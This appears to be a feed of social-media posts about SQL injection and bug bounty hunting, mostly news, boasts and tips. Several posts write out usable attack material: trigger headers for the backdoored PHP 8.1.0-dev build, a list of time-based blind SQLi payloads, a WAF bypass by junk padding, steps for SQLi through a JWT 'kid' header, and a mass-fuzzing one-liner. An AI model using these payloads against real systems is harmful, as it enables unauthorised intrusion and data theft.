MITRE's 2025 CWE Top 25: XSS #1, SQLi #2 from 39k CVEs. Missing auth rises; memory bugs persist.​ Prioritize input validation & CI/CD scans for cloud-native.​ Full post: https://t.co/jRFuRUovbx​ #CWE #MITRE #DevSecOps #Cybersecurity

If you find PHP 8.1.0-dev then try RCE & SQLi User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id'); #bugbounty #bugbountytips #rce #sqli

Post 16/30 : Quick SQLi OneLiner SQL Injection One-Liner waybackurls target[.]com | grep '=' | sort -u | nuclei -t ../fuzzing-templates/sqli -dast Working: This fetches all URLs with query parameters for the target domain using waybackurls, filters unique parameterized

🚨🔴CYBERALERT 🇫🇷FRANCE🔴 | Eurofiber victime d'une cyberattaque : +3600 clients impactés dont SNCF, AXA, ... ⤵️ Eurofiber France a subi le 13 novembre 2025 une énorme cyberattaque. Le groupe cybercriminel ByteToBreach, très aguerri,.a exploité une vulnérabilité (SQLi)

Fortinet #WAF #bypass for SQLI ----------------------------------- I recently came to an SQLi blocked by a Fortinet WAF and all my initial attempts to bypass via Encoding was unsuccessful. I finally was able to bypass simply appending more than 1K of junk.

I reported 2 SQLi bugs to an @intigriti public program all accepted and fixed Found 3 more. Submitted one, triager confirmed it, but the company still marked it “internal duplicate” with zero proof. Now I’m keeping the other two to myself no point feeding them free fixes 😂

🚨Alert🚨 CVE-2025-61675&CVE-2025-61678&CVE-2025-66039 : Critical SQLi,File-Upload, and AUTHTYPE Bypass Flaws in FreePBX could Lead to RCE. -------------------- CVE-2025-61675: An authenticated SQL injection vulnerability CVE-2025-61678: An authenticated arbitrary file upload

Today’s SQLI Done ✅ Quick tip: Always dig into the main domain not just the subdomains. You’ll be surprised how much everyone else overlooks #BugBounty #BugBountyLife #EthicalHacking #CyberSecurity #InfoSec #SQLi #WebSecurity #KeepHacking

hello sqli my old friend ^_^

Let’s keep our country safe. Four types of SQLi in a single shot is crazy 😅

I found an SQLi on the main app and I was able to execute any SQL function. They “fixed” it in two days and downgraded it to High, saying it was “read-only”💀 Anyway, below how I bypassed the WAF using parameter pollution #BugBounty #bugbountytips

Hey #bugbounty hunters 👋 just got rewarded 5,000💲on a self hosted program for a Sqli vulnerability 😉 #Hacking #cybersecurity #EthicalHacking #infosec

Today I discovered an SQLi vulnerability in a PostgreSQL application where the injection point was path-based with strict length restriction (32 chars). Spaces, slashes, quotes, and parentheses e.t.c. resulted in a 400 Bad Request error and the path wasn't URL-decoded

Huge thanks to author for this clean, no-nonsense infographic breaking down the six most common cyber attacks Phishing, MitM, DDoS, SQLi, Zero-Day, and XSS — all in one place with crystal-clear visuals. Perfect for anyone teaching, learning, or just starting in InfoSec, or

https://t.co/NF47euerei

Wallah chui en pleure 😭 on peut clôturer l’année 2025 sur cette vidéo venu tout droit d’la Belgique 🇧🇪

Found a target that actively uses the 'kid' JWT header parameter? Make sure to test for injection attacks, such as SQLi! 🤠 Here's how: 1. Decode the header 2. Inject your SQLi payload into the 'kid' parameter 3. Modify the JWT claims (payload) 4. Sign your JWT using your

SQLi Payloads XOR(if(now()=sysdate(),sleep(7),0))XOR%23 'or sleep(7)--# 'or sleep(7)# 'or sleep(7)='# 'or sleep(7)='-- '/*F*/or/*F*/sleep(7)=' 'or sleep(7)--%23 'or sleep(7)%23 'or sleep(7);%00 or sleep(7)--+- or sleep(7)# '/*f*/or/*f*/sleep/*f*/(7)--#

You can try the Suggest Attack Vectors feature in rep+. Add your Anthropic key and get quick ideas (IDOR, SQLi, weird params) right in the browser. I also used Bulk Replay to test without leaving DevTools. PS: Always understand what you’re doing. Never trust the LLM blindly.